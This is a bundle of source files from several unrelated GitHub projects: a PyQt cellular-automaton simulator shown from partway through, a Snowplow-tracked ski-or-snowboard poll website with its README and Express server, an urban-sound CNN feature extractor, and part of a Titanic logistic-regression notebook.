check4.setStyleSheet(\"QCheckBox::indicator {background-color: black}\")\n check4.setCheckState(2)\n if dic['011'] == 1:\n check5.setStyleSheet(\"QCheckBox::indicator {background-color: black}\")\n check5.setCheckState(2)\n if dic['010'] == 1:\n check6.setStyleSheet(\"QCheckBox::indicator {background-color: black}\")\n check6.setCheckState(2)\n if dic['001'] == 1:\n check7.setStyleSheet(\"QCheckBox::indicator {background-color: black}\")\n check7.setCheckState(2)\n if dic['000'] == 1:\n check8.setStyleSheet(\"QCheckBox::indicator {background-color: black}\")\n check8.setCheckState(2)\n\n cbb_regle.currentIndexChanged.connect(lambda: regles(self))\n f.close()\n\n\ndef regles(self):\n check1 = self.findChild(QtWidgets.QCheckBox, \"check1\")\n check2 = self.findChild(QtWidgets.QCheckBox, \"check2\")\n check3 = self.findChild(QtWidgets.QCheckBox, \"check3\")\n check4 = self.findChild(QtWidgets.QCheckBox, \"check4\")\n check5 = self.findChild(QtWidgets.QCheckBox, \"check5\")\n check6 = self.findChild(QtWidgets.QCheckBox, \"check6\")\n check7 = self.findChild(QtWidgets.QCheckBox, \"check7\")\n check8 = self.findChild(QtWidgets.QCheckBox, \"check8\")\n cbb_regle = self.findChild(QtWidgets.QComboBox, \"cbb_regle\")\n if cbb_regle.currentData():\n dic = eval(cbb_regle.currentData())\n\n if dic['111'] == 1:\n check1.setStyleSheet(\"QCheckBox::indicator {background-color: black}\")\n check1.setCheckState(2)\n else:\n check1.setStyleSheet(\"QCheckBox::indicator {background-color: white; border: 1px solid}\")\n check1.setCheckState(0)\n if dic['110'] == 1:\n check2.setStyleSheet(\"QCheckBox::indicator {background-color: black}\")\n check2.setCheckState(2)\n else:\n check2.setStyleSheet(\"QCheckBox::indicator {background-color: white; border: 1px solid}\")\n check2.setCheckState(0)\n if dic['101'] == 1:\n check3.setStyleSheet(\"QCheckBox::indicator {background-color: black}\")\n check3.setCheckState(2)\n else:\n check3.setStyleSheet(\"QCheckBox::indicator {background-color: white; border: 1px solid}\")\n check3.setCheckState(0)\n if dic['100'] == 1:\n check4.setStyleSheet(\"QCheckBox::indicator {background-color: black}\")\n check4.setCheckState(2)\n else:\n check4.setStyleSheet(\"QCheckBox::indicator {background-color: white; border: 1px solid}\")\n check4.setCheckState(0)\n if dic['011'] == 1:\n check5.setStyleSheet(\"QCheckBox::indicator {background-color: black}\")\n check5.setCheckState(2)\n else:\n check5.setStyleSheet(\"QCheckBox::indicator {background-color: white; border: 1px solid}\")\n check5.setCheckState(0)\n if dic['010'] == 1:\n check6.setStyleSheet(\"QCheckBox::indicator {background-color: black}\")\n check6.setCheckState(2)\n else:\n check6.setStyleSheet(\"QCheckBox::indicator {background-color: white; border: 1px solid}\")\n check6.setCheckState(0)\n if dic['001'] == 1:\n check7.setStyleSheet(\"QCheckBox::indicator {background-color: black}\")\n check7.setCheckState(2)\n else:\n check7.setStyleSheet(\"QCheckBox::indicator {background-color: white; border: 1px solid}\")\n check7.setCheckState(0)\n if dic['000'] == 1:\n check8.setStyleSheet(\"QCheckBox::indicator {background-color: black}\")\n check8.setCheckState(2)\n else:\n check8.setStyleSheet(\"QCheckBox::indicator {background-color: white; border: 1px solid}\")\n check8.setCheckState(0)\n\ndef state(i, self):\n check = self.findChild(QtWidgets.QCheckBox, \"check\" + str(i))\n if check.isChecked():\n check.setStyleSheet(\"QCheckBox::indicator {background-color: black}\")\n else:\n check.setStyleSheet(\"QCheckBox::indicator {background-color: white; border: 1px solid}\")\n\n\ndef resizeMatrice():\n global line, matrix\n\n for i in range(line - 1):\n matrix[i].append(0)\n matrix[i].insert(0, 0)\n return matrix\n\n\ndef matrice(engine, nb_exec, code, matrix):\n if code == 0:\n Line = []\n matrix = []\n cells = engine.getCellArray()\n for i in range(nb_exec):\n for e in cells:\n if e:\n Line.append(1)\n else:\n Line.append(0)\n matrix.append(Line)\n Line = []\n engine.tick()\n\n return matrix\n else:\n Line = []\n cells = engine.getCellArray()\n for e in cells:\n if e:\n Line.append(1)\n else:\n Line.append(0)\n matrix.append(Line)\n Line = []\n engine.tick()\n return matrix\n\n\ndef etape(self, timer, engine, matrix):\n global Row, line, column, current_exec, tStart\n form = self.findChild(QtWidgets.QFrame, \"form\")\n sp_exec = self.findChild(QtWidgets.QSpinBox, \"sp_nbexec\")\n sp_temps = self.findChild(QtWidgets.QSpinBox, \"sp_temps\")\n nb_exec = sp_exec.value()\n nb_temps = sp_temps.value()\n\n total_exec = nb_exec\n current_exec += 1\n\n if isTime:\n matrix = matrice(engine, 0, 1, matrix)\n\n print('Exec total = ' + str(total_exec) + ' | current = ' + str(current_exec) + ' | time = ' + str(\n time.time() - tStart))\n lcd = self.findChild(QtWidgets.QLCDNumber,\"lcdNumber\")\n lcd.display(time.time() - tStart)\n if isExec and current_exec >= total_exec:\n timer.stop()\n timer.disconnect()\n del timer\n del matrix\n form.setEnabled(True)\n popup = QtWidgets.QMessageBox().information(self, \"Fin de l'éxécution\",\n str(current_exec) + \" itérations effectuées. Simulation terminée.\",\n QtWidgets.QMessageBox.Ok)\n btn_start.setEnabled(True)\n btn_screen.setEnabled(True)\n return\n\n if isTime and (time.time() - tStart) > nb_temps:\n timer.stop()\n timer.disconnect()\n del timer\n del matrix\n form.setEnabled(True)\n popup = QtWidgets.QMessageBox().information(self, \"Fin de l'éxécution\",\n str(nb_temps) + \" secondes écoulées. Simulation terminée.\",\n QtWidgets.QMessageBox.Ok)\n btn_start.setEnabled(True)\n btn_screen.setEnabled(True)\n return\n\n graphic = self.findChild(QtWidgets.QGraphicsView, \"graphic\")\n scene = QtWidgets.QGraphicsScene()\n img = QImage(len(matrix[0]), line - 1, QImage.Format_Mono)\n\n if isExec:\n for i in range(line):\n for j in range(len(matrix[i])):\n if matrix[i][j] == 1:\n img.setPixel(j, i, 0)\n else:\n img.setPixel(j, i, 1)\n if isTime:\n for i in range(line):\n for j in range(len(matrix[i])):\n if matrix[i][j] == 1:\n img.setPixel(j, i, 0)\n else:\n img.setPixel(j, i, 1)\n\n pixmap = QPixmap(img)\n pixmap_scaled = pixmap.scaled(graphic.width() - 5, graphic.height() - 5, QtCore.Qt.IgnoreAspectRatio)\n gr = QtWidgets.QGraphicsPixmapItem()\n gr.setPixmap(pixmap_scaled)\n scene.addItem(gr)\n graphic.setScene(scene)\n line = line + 1\n\n\ndef resetvar():\n global tStart, current_exec, Row, line, column\n column = 2\n line = 1\n Row = 0\n current_exec = -1\n matrix = []\n tStart = time.time()\n\n\ndef start(self):\n form = self.findChild(QtWidgets.QFrame, \"form\")\n\n sp_taille = self.findChild(QtWidgets.QSpinBox, \"sp_taille\")\n if (isTime == False and isExec == False) or sp_taille.value() == 0:\n popup = QtWidgets.QMessageBox().information(self, \"Pas de paramètres\",\n \" Vous devez choisir un nombre d'éxécution ou une durée ainsi qu'une taille de ligne\",\n QtWidgets.QMessageBox.Ok)\n return\n resetvar()\n btn_start.setEnabled(False)\n btn_pause.setEnabled(True)\n btn_screen.setEnabled(False)\n form.setEnabled(False)\n check2 = self.findChild(QtWidgets.QCheckBox, \"check2\")\n check3 = self.findChild(QtWidgets.QCheckBox, \"check3\")\n check4 = self.findChild(QtWidgets.QCheckBox, \"check4\")\n check5 = self.findChild(QtWidgets.QCheckBox, \"check5\")\n check6 = self.findChild(QtWidgets.QCheckBox, \"check6\")\n check7 = self.findChild(QtWidgets.QCheckBox, \"check7\")\n check8 = self.findChild(QtWidgets.QCheckBox, \"check8\")\n rule1 = Rule(False, 0, 0, 0)\n rule2 = Rule(False, 0, 0, 1)\n rule3 = Rule(False, 0, 1, 0)\n rule4 = Rule(False, 0, 1, 1)\n rule5 = Rule(False, 1, 0, 0)\n rule6 = Rule(False, 1, 0, 1)\n rule7 = Rule(False, 1, 1, 0)\n rule8 = Rule(False, 1, 1, 1)\n rules = {rule1: not check1.isChecked(), rule2: not check2.isChecked(), rule3: not check3.isChecked(),\n rule4: not check4.isChecked(), rule5: not check5.isChecked(), rule6: not check6.isChecked(),\n rule7: not check7.isChecked(), rule8: not check8.isChecked()}\n\n cells = CellArray(sp_taille.value())\n rules = RulesCollection(rules)\n engine = Backend(rules, cells)\n\n sp_exec = self.findChild(QtWidgets.QSpinBox, \"sp_nbexec\")\n sp_temps = self.findChild(QtWidgets.QSpinBox, \"sp_temps\")\n nb_exec = sp_exec.value()\n nb_temps = sp_temps.value()\n\n total_exec = nb_exec\n matrix = []\n if isExec:\n matrix = matrice(engine, total_exec, 0, matrix)\n\n timer = QtCore.QTimer()\n timer.timeout.connect(lambda: etape(self, timer, engine, matrix))\n\n timer.setInterval(100)\n timer.start()\n btn_pause.pressed.connect(lambda: pause(timer, window))\n\n\ndef StateSpinExec(self):\n global isExec\n radioButtonExec = self.findChild(QtWidgets.QRadioButton, \"rb_is_exec\")\n sp_exec = self.findChild(QtWidgets.QSpinBox, \"sp_nbexec\")\n if radioButtonExec.isChecked():\n sp_exec.setEnabled(True)\n isExec = True\n else:\n sp_exec.setEnabled(False)\n isExec = False\n\n\ndef StateSpinTemps(self):\n global isTime\n radioButtonTemps = self.findChild(QtWidgets.QRadioButton, \"rb_is_time\")\n sp_temps = self.findChild(QtWidgets.QSpinBox, \"sp_temps\")\n if radioButtonTemps.isChecked():\n sp_temps.setEnabled(True)\n isTime = True\n else:\n sp_temps.setEnabled(False)\n isTime = False\n\n\ndef save(self):\n check1 = self.findChild(QtWidgets.QCheckBox, \"check1\")\n check2 = self.findChild(QtWidgets.QCheckBox, \"check2\")\n check3 = self.findChild(QtWidgets.QCheckBox, \"check3\")\n check4 = self.findChild(QtWidgets.QCheckBox, \"check4\")\n check5 = self.findChild(QtWidgets.QCheckBox, \"check5\")\n check6 = self.findChild(QtWidgets.QCheckBox, \"check6\")\n check7 = self.findChild(QtWidgets.QCheckBox, \"check7\")\n check8 = self.findChild(QtWidgets.QCheckBox, \"check8\")\n regle = {\"111\": int(check1.isChecked()), \"110\": int(check2.isChecked()), \"101\": int(check3.isChecked()),\n \"100\": int(check4.isChecked()), \"011\": int(check5.isChecked()), \"010\": int(check6.isChecked()),\n \"001\": int(check7.isChecked()), \"000\": int(check8.isChecked())}\n text, popup = QtWidgets.QInputDialog.getText(self, 'Nom de la règle', 'Entrez le nom de la règle:')\n if popup:\n f = open(\"../Interface/regles.txt\", \"a\")\n string = text + \";\" + str(regle) + \"\\n\"\n f.write(string)\n f.close()\n cbb_regle = self.findChild(QtWidgets.QComboBox, \"cbb_regle\")\n cbb_regle.clear()\n f = open(\"../Interface/regles.txt\", \"r\")\n for x in f.readlines():\n splited = x.split(\";\")\n cbb_regle.addItem(splited[0], splited[1])\n popup = QtWidgets.QMessageBox().information(self, \"Sauvegarde effectuée\",\n \"La règle a été sauvegardée avec succés\", QtWidgets.QMessageBox.Ok)\n\n\ndef pause(timer, self):\n btn_screen = self.findChild(QtWidgets.QPushButton, \"btn_screen\")\n if timer.isActive():\n btn_pause.setText(\"Play\")\n timer.stop()\n btn_screen.setEnabled(True)\n else:\n btn_pause.setText(\"Pause\")\n timer.start()\n btn_screen.setEnabled(False)\n\n\ndef screen(self):\n graphic = self.findChild(QtWidgets.QGraphicsView, \"graphic\")\n scene = graphic.scene()\n pixmap = graphic.grab(scene.sceneRect().toRect())\n dlg = QFileDialog()\n dlg.setAcceptMode(QFileDialog.AcceptSave)\n dlg.setNameFilters([\"Images (*.png *.jpg)\"])\n dlg.selectNameFilter(\"Images (*.png *.jpg)\")\n if dlg.exec_():\n pixmap.save(dlg.selectedFiles()[0])\n popup = QtWidgets.QMessageBox().information(self, \"Fichier sauvegardé\",\n \"L'image a été sauvegardé : \" + dlg.selectedFiles()[0],\n QtWidgets.QMessageBox.Ok)\n\n\nif __name__ == '__main__':\n app = QtWidgets.QApplication(sys.argv)\n window = Ui()\n\n btn_start = window.findChild(QtWidgets.QPushButton, \"btn_start\")\n btn_pause = window.findChild(QtWidgets.QPushButton, \"btn_pause\")\n btn_exit = window.findChild(QtWidgets.QPushButton, \"btn_exit\")\n btn_save = window.findChild(QtWidgets.QPushButton, \"btn_save\")\n btn_screen = window.findChild(QtWidgets.QPushButton, \"btn_screen\")\n\n check1 = window.findChild(QtWidgets.QCheckBox, \"check1\")\n\n radioButtonExec = window.findChild(QtWidgets.QRadioButton, \"rb_is_exec\")\n radioButtonExec.toggled.connect(lambda: StateSpinExec(window))\n\n radioButtonTemps = window.findChild(QtWidgets.QRadioButton, \"rb_is_time\")\n radioButtonTemps.toggled.connect(lambda: StateSpinTemps(window))\n\n btn_start.pressed.connect(lambda: start(window))\n btn_save.pressed.connect(lambda: save(window))\n btn_exit.pressed.connect(app.quit)\n btn_screen.pressed.connect(lambda: screen(window))\n\n sys.exit(app.exec_())\n"
}
] | 7 |
MykeNuLeng/generic-webiste | https://github.com/MykeNuLeng/generic-webiste | 93a24751514eb2aa24f7ac01019af853670546c7 | fdd84dda07b18855b74c14a23ee616ef21c1e8a5 | 7154cbeb106680d12427e8881b1d812332cd6516 | refs/heads/main | 2023-05-05T23:11:10.564227 | 2021-06-01T10:07:49 | 2021-06-01T10:07:49 | 369,561,696 | 0 | 0 | null | null | null | null | null | [
{
"alpha_fraction": 0.7673674821853638,
"alphanum_fraction": 0.7728519439697266,
"avg_line_length": 69.58064270019531,
"blob_id": "4cace8239cece92f7893b04513b5523af000ffb6",
"content_id": "e7d703ae4450780874576667c66b088956f507b6",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 6564,
"license_type": "no_license",
"max_line_length": 782,
"num_lines": 93,
"path": "/README.md",
"repo_name": "MykeNuLeng/generic-webiste",
"src_encoding": "UTF-8",
"text": "# Snowplow Tech Test\n\nThis is a simple website that asks the question \"Skiing or snowboarding?\", and uses snowplow-micro to store the results.\n\n## Setup\n\n- Clone this repo into your chosen directory.\n- Download [snowplow/snowplow-micro](https://hub.docker.com/r/snowplow/snowplow-micro) from Docker-Hub.\n- Run `$ docker run --mount type=bind,source=$(pwd)/example,destination=/config -p 9090:9090 snowplow/snowplow-micro:1.1.2 --collector-config /config/micro.conf --iglu /config/iglu.json` in the repo.\n- Same for `npm install`.\n- Start the node server with `node app.js`\n- Go to http://localhost:8888/\n\n## Method\n\n### Styling\n\nNow I want to start off by appreciating that starting on styling is weird. But I had an image in my head of what I wanted the website to look like, and I didn't know how to tackle snowplow-micro.\n\nI would say that I find myself more comfortable working on typical backend problems, so I wanted to learn a handful of styling methods and implement them into this project. Admittedly, I spent too much time on this, but I learnt a lot, so it was by no means wasted.\n\nTo start off, I chose a background image that:\n\n- Was skiing themed, because, Snowplow.\n- Had a large depth of field, so the parallax effect was more obvious.\n\nOnce I found the image(from [unsplash](https://unsplash.com/photos/2Gs29PjkAA4)), I prepared it in Adobe Photoshop by separating out the layers into the three different images([slope](https://github.com/MykeNuLeng/generic-webiste/blob/main/public/slope.png), [jump](https://github.com/MykeNuLeng/generic-webiste/blob/main/public/jump.png), [bg](https://github.com/MykeNuLeng/generic-webiste/blob/main/public/bg.png)). Then using JS's [Timeline](https://greensock.com/docs/v2/TimelineMax) library, I animated the images so that the images in the foreground moved up the screen, and the background slightly down. This gave the illusion of the camera panning down. Then using JS's [ScrollMagic](https://scrollmagic.io/) library, I made the animation rely on scrolling rather than time.\n\n### Getting snowplow-micro to talk\n\nThis was all brand new to me, so in hindsight I can look back at this and think it's straight forward, but at the time, not so much.\nThere were a few steps to get this running:\n\n- To start off I needed to get Windows Subsystem for Linux set up on my PC, which was definitely more involved than I was expecting.\n- Then installing Docker.\n- Installing snowplow/snowplow-micro from Docker Hub\n- Run the Docker command from snowplow-micro's readme in my project directory\n- Copy across the config files from snowplow-micro - This step took me far longer than I care to admit.\n- Using Snoplow's pretty extensive JS tracking library documentation, I found the script tag to put in the head of my [index](https://github.com/MykeNuLeng/generic-webiste/blob/main/index.html) page, and the trackPageView function to implement with it.\n- Run the Docker container.\n- Load up localhost:9090/micro/all\n I got to admit, when I saw the api returning actual events I was a combination of relieved and excited in about equal measures.\n\n### Tracking the poll results\n\nThe initial goal was to have buttons for the poll, and use onclick functions to trigger an event which could then be accessed from micro. I couldn't quite figure out how to implement this custom event, so I went with links as I knew how to implement trackPageView from the setup.\n\nFrom there I made 2 pages([ski](https://github.com/MykeNuLeng/generic-webiste/blob/main/ski.html), [snowboard](https://github.com/MykeNuLeng/generic-webiste/blob/main/snowboard.html)) for each link in the poll, with trackPageView scripts in the head of both. I made a custom title for each of them to make it easier to distinguish the events. Although in hindsight, the JSON from the api includes a url tag, and as I was using separate pages, I could have just relied on that instead of the custom title.\n\nThe async for the tracking script was 1s, so I made it redirect back to the homepage after 2, which does feel quite clunky, another reason why buttons would have been a lot nicer.\n\nNow that the 2 pages were being tracked, I wanted a way to display the results of the poll on the homepage.\n\nSo to start with, I wanted to make a function that searched through the json data, checked each events name_tracker, and added it to the result if it corresponded to what I was looking for.\n\nAs I'm a lot more comfortable coding in Python, I thought it would be a great idea to go ahead and do this, in Python. This was a terrible idea, as I didn't consider how I was going to integrate this function into my node server. Either way, the mistake made me laugh, so I've left the [file](https://github.com/MykeNuLeng/generic-webiste/blob/main/public/json_fetch.py) in the repo.\n\nAfter that I rewrote it in JS in this [file](https://github.com/MykeNuLeng/generic-webiste/blob/main/public/json_fetch.js), and when run on node in my terminal, the functions were returning correctly, so time to move on.\n\nAt this point I wanted to use the functions that I wrote directly in my HTML, so I tried using [EJS](https://ejs.co/), this was a bit fiddly to adjust the file structure, and the node server, but nothing too bad.\n\nHowever, when doing this I kept getting CORS errors, so EJS was scrapped.\n\nThe next idea was to load the api data into a route on the node [server](https://github.com/MykeNuLeng/generic-webiste/blob/main/app.js), and then access the data from there. This seemed to work when going to localhost:8888/api so I stuck with that.\n\nFrom there I wrote an IIFE in the script [file](https://github.com/MykeNuLeng/generic-webiste/blob/main/public/script.js)(that was currently only being used to hold the animation for the website) to access the data from localhost:8888/api and add it to the innerHTML of an element on the homepage.\n\n## Conclusion\n\n### New Technologies\n\n- WSL\n- Docker\n- Snowplow-micro\n- Snowplow JS tracker\n- EJS\n- Timeline\n- ScrollMagic\n- Adobe Photoshop\n\n### Lessons\n\nIn reflection I would say that I didn't spend enough time planning. With better foresight I would have:\n\n- Familiarized myself with snowplow-micro before starting on the project, as I think the everything would have fallen into place a lot quicker afterwards.\n- I could have avoided writing a file in Python, and wasting time trying to come up with ways to integrate it.\n- I could have managed my time a lot better as well.\n\n### Summary\n\n- I'm pretty happy with how it turned out\n- Buttons rather than links would have been so nice\n- The parallax effect is really striking\n"
},
{
"alpha_fraction": 0.5528846383094788,
"alphanum_fraction": 0.5961538553237915,
"avg_line_length": 28.714284896850586,
"blob_id": "b8d1c4f81e82f322fac38ab263c7a26db6d45c95",
"content_id": "3f1dc80967142cb54009e41930ff25b72f05cc22",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "JavaScript",
"length_bytes": 1040,
"license_type": "no_license",
"max_line_length": 71,
"num_lines": 35,
"path": "/public/script.js",
"repo_name": "MykeNuLeng/generic-webiste",
"src_encoding": "UTF-8",
"text": "let controller = new ScrollMagic.Controller();\nlet timeline = new TimelineMax();\n\n// scrollMagic animation\ntimeline\n .to(\".slope\", 10, { y: -500 })\n .fromTo(\".jump\", { y: -50 }, { y: -300, duration: 10 }, \"-=10\")\n .fromTo(\".bg\", { y: -20 }, { y: 0, duration: 10 }, \"-=10\")\n .to(\".content\", 10, { top: \"0%\" }, \"-=10\")\n .fromTo(\".text\", { opacity: 0 }, { opacity: 1, duration: 3 })\n .fromTo(\".score\", { opacity: 0 }, { opacity: 1, duration: 3 }, \"-=3\")\n .fromTo(\n \".content-buttons\",\n { opacity: 0 },\n { opacity: 1, duration: 3 },\n \"-=3\"\n );\n\nlet scene = new ScrollMagic.Scene({\n triggerElement: \"section\",\n duration: \"200%\",\n triggerHook: 0\n})\n .setTween(timeline)\n .setPin(\"section\")\n .addTo(controller);\n\n//loading results from api to innerHTML of poll results in index.html\n(async function () {\n const response = await fetch(\"http://localhost:8888/api\");\n const score = await response.json();\n document.querySelector(\n \".score\"\n ).innerHTML = `Poll results ${score.skiing} : ${score.snowboarding}`;\n})();\n"
},
{
"alpha_fraction": 0.6637837886810303,
"alphanum_fraction": 0.6702702641487122,
"avg_line_length": 26.205883026123047,
"blob_id": "3e78542ca51b5e45567679618eb246fe871f3b02",
"content_id": "48d7987a016f9dd3986426222f7661e014f8c38c",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "JavaScript",
"length_bytes": 925,
"license_type": "no_license",
"max_line_length": 85,
"num_lines": 34,
"path": "/app.js",
"repo_name": "MykeNuLeng/generic-webiste",
"src_encoding": "UTF-8",
"text": "const express = require(\"express\");\nconst path = require(\"path\");\nconst jsonFetch = require(\"./public/json_fetch\");\n\nconst app = express();\nconst port = process.env.PORT || 8888;\n\n//setting middleware\napp.use(express.static(__dirname + \"/public\")); //Serves resources from public folder\n\n//homepage\napp.get(\"/\", function (req, res) {\n res.sendFile(path.join(__dirname, \"/index.html\"));\n});\n\n//calling api from snowplow-micro\napp.get(\"/api\", function (req, res) {\n jsonFetch.getScore().then((score) => {\n res.json(score);\n });\n});\n\n//ski poll answer page, redirects to home page after 2s\napp.get(\"/ski\", function (req, res) {\n res.sendFile(path.join(__dirname, \"/ski.html\"));\n});\n\n//snowboard poll page, redirects to home page after 2s\napp.get(\"/snowboard\", function (req, res) {\n res.sendFile(path.join(__dirname, \"/snowboard.html\"));\n});\n\napp.listen(port);\nconsole.log(\"Server started at http://localhost:\" + port);\n"
},
{
"alpha_fraction": 0.6197410821914673,
"alphanum_fraction": 0.6262136101722717,
"avg_line_length": 25.869565963745117,
"blob_id": "f1af5ddf7213ec50dd1191538e824e49c3c2460c",
"content_id": "f0f510cf79fb8a1d033d1308c194166e40391195",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 618,
"license_type": "no_license",
"max_line_length": 77,
"num_lines": 23,
"path": "/public/json_fetch.py",
"repo_name": "MykeNuLeng/generic-webiste",
"src_encoding": "UTF-8",
"text": "import urllib.request\nimport json\n\n\ndef return_json():\n url = \"http://localhost:9090/micro/good\"\n response = urllib.request.urlopen(url)\n data = json.loads(response.read())\n return data\n\n\ndef snowboard_count():\n data = return_json()\n snowboard_events = [raw_event for raw_event in data if raw_event[\"event\"]\n [\"name_tracker\"] == \"SnowboardTracker\"]\n return len(snowboard_events)\n\n\ndef ski_count():\n data = return_json()\n ski_events = [raw_event for raw_event in data if raw_event[\"event\"]\n [\"name_tracker\"] == \"SkiTracker\"]\n return len(ski_events)\n"
},
{
"alpha_fraction": 0.5837838053703308,
"alphanum_fraction": 0.5935134887695312,
"avg_line_length": 22.125,
"blob_id": "98f65d6de85403763ae3424aab51dfe7ccbfc530",
"content_id": "6b0a867ee4a066dff696e912ab6116e34d8d8e50",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "JavaScript",
"length_bytes": 925,
"license_type": "no_license",
"max_line_length": 72,
"num_lines": 40,
"path": "/public/json_fetch.js",
"repo_name": "MykeNuLeng/generic-webiste",
"src_encoding": "UTF-8",
"text": "const fetch = require(\"node-fetch\");\nconst jsonFetch = {\n getEvents: async function () {\n const response = await fetch(\"http://localhost:9090/micro/good\");\n const events = await response.json();\n\n return events;\n },\n\n snowboardCount: async function () {\n const events = await this.getEvents();\n let total = 0;\n events.forEach((element) => {\n if (element.event.name_tracker === \"SnowboardTracker\") total += 1;\n });\n return total;\n },\n\n skiCount: async function () {\n const events = await this.getEvents();\n let total = 0;\n for (i = 0; i < events.length; i++) {\n if (events[i].event.name_tracker === \"SkiTracker\") {\n total += 1;\n }\n }\n return total;\n },\n\n getScore: async function () {\n snowboarding = await this.snowboardCount();\n skiing = await this.skiCount();\n return {\n snowboarding,\n skiing\n };\n }\n};\n\nmodule.exports = jsonFetch;\n"
}
] | 5 |
josjsjen/Urban-Sound-Classification | https://github.com/josjsjen/Urban-Sound-Classification | 29887e8d5bb75e29da7aabb8615c6e89071d342d | 8bef11709613eaf573748f4eabbaaeda10952ab0 | ee204a61edbb2b4ba1a5d8a62740b2a8cdfa20d1 | refs/heads/master | 2020-03-16T17:42:01.885015 | 2018-05-10T14:15:17 | 2018-05-10T14:15:17 | 132,841,956 | 0 | 0 | null | null | null | null | null | [
{
"alpha_fraction": 0.5845410823822021,
"alphanum_fraction": 0.6006441116333008,
"avg_line_length": 34.056602478027344,
"blob_id": "06cfcfe2ca0a556ea37dd30abd14388855ce0501",
"content_id": "b08df0b3f4ba298566b27d55a47ae6bc18a452d6",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1863,
"license_type": "no_license",
"max_line_length": 91,
"num_lines": 53,
"path": "/CNN_urban.py",
"repo_name": "josjsjen/Urban-Sound-Classification",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/env python2\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Tue May 8 19:52:34 2018\n\n@author: jie\n\"\"\"\n\nimport glob\nimport os\nimport librosa\nimport matplotlib.pyplot as plt\nimport tensorflow as tf\nimport numpy as np\n\nplt.style.use('ggplot')\n\ndef windows(data, window_size):\n start = 0\n while start < len(data):\n yield start, start + window_size\n start += (window_size / 2)\n\ndef extract_features(parent_dir,sub_dirs,file_ext=\"*.wav\",bands = 60, frames = 41):\n window_size = 512 * (frames - 1)\n log_specgrams = []\n labels = []\n for l, sub_dir in enumerate(sub_dirs):\n for fn in glob.glob(os.path.join(parent_dir, sub_dir, file_ext)):\n sound_clip,s = librosa.load(fn)\n label = fn.split('/')[2].split('-')[1]\n for (start,end) in windows(sound_clip,window_size):\n if(len(sound_clip[start:end]) == window_size):\n signal = sound_clip[start:end]\n melspec = librosa.feature.melspectrogram(signal, n_mels = bands)\n logspec = librosa.logamplitude(melspec)\n logspec = logspec.T.flatten()[:, np.newaxis].T\n log_specgrams.append(logspec)\n labels.append(label)\n \n log_specgrams = np.asarray(log_specgrams).reshape(len(log_specgrams),bands,frames,1)\n features = np.concatenate((log_specgrams, np.zeros(np.shape(log_specgrams))), axis = 3)\n for i in range(len(features)):\n features[i, :, :, 1] = librosa.feature.delta(features[i, :, :, 0])\n \n return np.array(features), np.array(labels,dtype = np.int)\n\ndef one_hot_encode(labels):\n n_labels = len(labels)\n n_unique_labels = len(np.unique(labels))\n one_hot_encode = np.zeros((n_labels,n_unique_labels))\n one_hot_encode[np.arange(n_labels), labels] = 1\n return one_hot_encode\n \n"
},
{
"alpha_fraction": 0.8013029098510742,
"alphanum_fraction": 0.8013029098510742,
"avg_line_length": 101,
"blob_id": "b3b98cd1ab0baf41f7c14c8891aac4c29e5881d3",
"content_id": "a8f75411b548c82b52d391dda2e70b7726d52e71",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 311,
"license_type": "no_license",
"max_line_length": 274,
"num_lines": 3,
"path": "/README.md",
"repo_name": "josjsjen/Urban-Sound-Classification",
"src_encoding": "UTF-8",
"text": "# Urban Sound Classification \n\nThe goal of this project is to create a “good” model to predict the urban sound. This series of Jupyter (IPython) notebooks provides a quick way to start analyzing this dataset. It gives an overview of the underlying data, shows some baseline machine classification results.\n\n"
}
] | 2 |
atembamanu/Machine-Learning-Titanic-Survivers-Logistic-Regression | https://github.com/atembamanu/Machine-Learning-Titanic-Survivers-Logistic-Regression | 7c3441786710f15fd1a6e44853d16da0cf5e88cb | 4bef4aecfe795a4aea701cbeb5ae0aaf7cb3fef5 | 00c2db86fcd2e3c10d80df38b7364600fea5a765 | refs/heads/master | 2022-05-21T13:38:06.707139 | 2020-04-30T06:58:40 | 2020-04-30T06:58:40 | 260,136,454 | 0 | 0 | null | null | null | null | null | [
{
"alpha_fraction": 0.6043218970298767,
"alphanum_fraction": 0.6507700085639954,
"avg_line_length": 10.297752380371094,
"blob_id": "1925e55c4c7885094af1bbecedfa6fdbfbc52029",
"content_id": "4ace8bbcc450df8ed1d1b101cfe7505d04daa7ea",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 4026,
"license_type": "permissive",
"max_line_length": 88,
"num_lines": 356,
"path": "/Titanic_Logistic_Regression.py",
"repo_name": "atembamanu/Machine-Learning-Titanic-Survivers-Logistic-Regression",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/env python\n# coding: utf-8\n\n# In[95]:\n\n\nimport pandas as pd\nimport numpy as np\nimport seaborn as sns\nimport matplotlib.pyplot as plt\nimport math\n\n\n# ## Step 1: collecting data\n\n# In[96]:\n\n\n#Reading data\n\ntitanic_data = pd.read_csv('titanic_train_clean.csv')\ntitanic_data.head(10)\n\n\n# In[97]:\n\n\n#Get the total number of passengers \ntitanic_data.shape\n\n\n# ## Step 2 Analyzing Data\n\n# In[98]:\n\n\n#survived vs not survived\nsns.countplot(x = 'Survived', data = titanic_data)\n\n\n# In[99]:\n\n\n#how many males and females\nsns.countplot(x = 'Survived', hue='Sex', data=titanic_data)\n\n\n# In[100]:\n\n\n#ticket class of the passengers\nsns.countplot(x='Survived', hue='Pclass', data=titanic_data)\n\n\n# In[101]:\n\n\n#Age distribution\ntitanic_data['Age'].plot.hist()\n\n\n# In[102]:\n\n\n#Fare Distribution\ntitanic_data['Fare'].plot.hist()\n\n\n# In[103]:\n\n\n#get info on columns \ntitanic_data.info()\n\n\n# In[104]:\n\n\nsns.countplot(x='SibSp', data=titanic_data)\n\n\n# In[105]:\n\n\nsns.countplot(x='Parch', data=titanic_data)\n\n\n# ## Step 3 Data Wrangling\n\n# In[106]:\n\n\n#cleaning the data, removing all null values\n\n#check for null values\ntitanic_data.isnull()\n\n\n# In[107]:\n\n\n#show all null values in the 